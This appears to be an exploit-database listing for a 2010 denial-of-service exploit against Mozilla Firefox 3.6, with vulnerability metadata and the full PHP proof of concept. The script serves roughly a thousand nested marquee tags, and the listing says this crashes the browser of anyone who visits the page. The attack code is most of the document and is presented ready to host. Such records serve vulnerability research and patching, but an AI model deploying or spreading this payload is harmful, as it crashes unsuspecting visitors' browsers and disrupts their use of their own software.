Mozilla Firefox - exploit.company

vendor:

Firefox

by:

Ale46

7.5

CVSS

HIGH

Remote Denial Of Service

CWE

Product Name: Firefox

Affected Version From: 3.6

Affected Version To: 3.6

Patch Exists: NO

Related CWE:

CPE: a:mozilla:firefox:3.6

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 x32/x64, Ubuntu 9.10 x32

2010

Mozilla Firefox <=3.6 - Remote Denial Of Service Exploit

Visiting this php page causes an instant crash of Firefox.

Mitigation:

Upgrade to a version higher than 3.6.

Source

Exploit-DB raw data:

<?php

/*
*    Title: Mozilla Firefox <=3.6 - Remote Denial Of Service Exploit
*    Date: 25/02/10
*    Author: Ale46 - ale46[at]paranoici[dot]org
*    Software Link: http://www.mozilla-europe.org/en/firefox/
*    Version: 3.6 and 3.5.8 are vulnerable so I think that all versions <= 3.6 have the same issue
*    Tested on: Windows 7 x32\x64 - Ubuntu 9.10 x32
*    Description: visiting this php page you'll get an instant crash of Firefox
*    Greetz: Gandalf
*    Extra Greetz: University of Palermo and its fantastics rules for the Computer Engineering degree (how beautiful 's irony)
*/

$a = '<marquee>';
$b = '</marquee>';

for ($i=0;$i<=1000;$i++){
    $a .= '<marquee>';
    $b .= '</marquee>';
}

echo '<body>';
echo $a;
echo "hadouken!";
echo $b;
echo '</body>';

?>